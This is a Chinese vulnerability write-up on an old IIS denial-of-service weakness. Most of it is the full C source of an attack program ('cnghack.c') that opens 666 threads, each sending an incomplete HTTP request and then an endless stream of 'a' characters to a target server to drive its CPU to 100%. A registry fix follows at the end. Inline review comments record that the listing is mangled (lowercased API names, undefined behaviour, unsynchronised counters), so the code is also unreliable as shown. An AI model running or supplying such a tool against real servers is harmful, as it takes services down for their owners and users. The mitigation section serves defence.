17 iis web server dos
漏洞描述:
默认情况下，iis容易受到拒绝服务攻击。如果注册表中名为 "maxclientrequestbuffer" 的键尚未创建，针对这类nt系统的攻击通常能奏效。"maxclientrequestbuffer" 这个键用于设置iis允许接受的输入量：如果将其设置为256(bytes)，则攻击者发送的大量字符请求会被iis限制在256字节以内。而系统的缺省设置对此不加限制，因此，利用下面的程序可以很容易地对iis server实施dos攻击：
#include <stdio.h>
#include <windows.h>
#define max_thread 666
void cng();              // worker thread body, one instance per createthread() call in main()
char *server;            // target host string (argv[1]); shared read-only by every thread
char *buffer;            // payload streamed by each worker; allocated in main(), never freed
int port;                // target port (argv[2] via atoi)
int counter = 0;         // thread index used by main() when spawning / terminating
int current_threads = 0; // incremented/decremented by cng() from many threads with no synchronisation (data race)
/*
 * Entry point of cnghack.c (the listing the write-up below summarises).
 * Parses [server] [port] from argv, initialises Winsock, spawns
 * max_thread (666) threads running cng(), waits, then terminates them.
 * NOTE(review): every Win32/Winsock identifier (word, wsadata, dword,
 * handle, makeword, wsastartup, createthread, ...) is printed in lower
 * case -- presumably a transcription artefact; as shown this does not
 * compile.
 */
int main(int argc, char **argv)
{
word tequila;           // requested Winsock version, built by makeword(1, 1)
wsadata data;           // filled in by wsastartup()
int p;
dword tid;              // thread-id out-parameter of createthread(); never read
handle hthread[2000];   // thread handles; only the first max_thread (666) slots are used
//this code is as is and sucks as it is. won't exit correctly and a lot
of other fun things.
//that i didn't want to take the time to do. so just ctrl+c out of the
code.
//load up cnghack.exe 3 times for charm.
printf("cng iis dos.\nmarc@eeye.com\nhttp://www.eeye.com\n\"for my
beloved.\"\n");
// NOTE(review): the check only rejects argc<2, but argv[2] is read
// below, so "prog server" alone passes atoi() a null pointer.
if(argc<2){
printf("usage: %s [server] [port]\n",argv[0]);
exit(1);
}
// NOTE(review): the malloc() result is unchecked, and strlen() is applied
// to freshly allocated, uninitialised memory -- undefined behaviour; how
// many bytes end up filled with 'a' depends on whatever garbage the
// allocator returned. The buffer is never freed.
buffer=malloc(17500);
memset( buffer, 'a', strlen(buffer));
server=argv[1];          // published to the workers via the globals
port=atoi(argv[2]);      // atoi() gives no error indication for a bad port string
tequila = makeword( 1, 1 );
printf("attempting to start winsock... ");
if( (wsastartup(tequila, &data)) !=0 ){
printf("failed to start winsock.\n");
exit(1);
}
else{
printf("started winsock.\n\n");
}
counter = 0;
// Spawn the workers. cng() takes no parameters, so the value passed as
// the thread argument is ignored. counter never exceeds 666 < 2000, so
// the hthread index stays in range.
// NOTE(review): counter is read in the subscript on the left and
// incremented on the right of the same assignment -- unsequenced
// modification and read, undefined behaviour in C.
for(p = 0 ; p < max_thread ; ++p ){
hthread[counter] = createthread(0,
0,
(lpthread_start_routine) cng,
( void * )++counter,
0,
&tid);
}
sleep(250);
// Waits until every worker has decremented current_threads. cng()'s
// inner for(;;) never exits, so this falls through only if every
// connect() failed; otherwise the process runs until Ctrl+C, as the
// author's comment above says. current_threads is a plain, unsynchronised int.
while( current_threads )
sleep(250);
counter = 0;
printf("terminated threads.\n");
// Forcibly kills each worker; sockets opened in cng() are never closed
// and the heap buffer is never released.
while (counter < max_thread)
{
terminatethread( hthread[counter], 0 );
++counter;
}
wsacleanup();
return 0;
}
/*
 * Worker thread body (one per createthread() call in main()). Opens a
 * TCP connection to server:port, sends the incomplete request line
 * "get / http/\r\n" and then streams the global buffer in an endless
 * loop -- the behaviour the write-up below describes. All state is
 * shared through the file-scope globals; current_threads is a plain int
 * updated from every thread with no synchronisation.
 */
void cng()
{
int sockfd=0, p;
struct sockaddr_in dstsain;      // only sin_family/sin_port/sin_addr are set; the rest is left uninitialised
char getkilled[]="get / http/\r\n";
int die=1;                       // unused
printf("entered cng\n");
++current_threads;
dstsain.sin_family = af_inet;
dstsain.sin_port = htons((u_short)port);
// inet_addr() accepts only a dotted-quad string; a failure (INADDR_NONE)
// is not checked, so a bad/unresolvable server string is still connected to.
dstsain.sin_addr.s_addr=inet_addr( server );
if((sockfd = socket(af_inet, sock_stream, 0)) < 0){
printf("failed to create socket\n");
--current_threads;
return;
}
// connect() returns 0 on success
if(!connect(sockfd,(struct sockaddr *)&dstsain, sizeof(dstsain)))
{
p=send(sockfd,getkilled,strlen(getkilled),0);
printf("step 1: %i\n", p);
// No exit condition and no error handling: a -1 from send() just loops,
// as the author's own comment admits. The thread ends only when main()
// calls terminatethread() on it. strlen(buffer) here inherits the
// uninitialised-memory problem from main()'s memset() fill.
for(;;){
p=send(sockfd,buffer,strlen(buffer),0);
printf("p: %i\n", p);
//put in some code to check if send = -1 more then x times we drop
the loop and exit the thread
//bla bla bla i love the dirtiness of concept code.
}
}
// Reached only when connect() fails; the socket is never closed
// (there is no closesocket() on any path).
--current_threads;
printf("exited cng\n");
return;
}
cnghack.c works by doing the following:
connects to example.com
sends: get / http/[return][buffer]
where:
[return] is just an \r\n
[buffer] is a never-ending stream of a's
攻击的结果是nt系统的cpu占用率达到100%。
解决方案
运行regedt32.exe
在:hkey_local_machine\system\currentcontrolset\services\w3svc\parameters
增加一个值:
value name: maxclientrequestbuffer
data type: reg_dword
基数选择十进制，
具体数值即为你希望iis允许接受的url最大长度。
cnns的设置为256